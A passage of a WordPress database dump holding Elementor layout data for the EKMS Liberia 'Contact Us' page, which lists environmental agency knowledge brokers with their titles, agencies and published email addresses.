Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23155,3350,'_elementor_edit_mode','builder'),(23156,3350,'_elementor_template_type','wp-page'),(23157,3350,'_elementor_version','3.0.16'),(23158,3350,'_wp_page_template','default'),(23159,3350,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\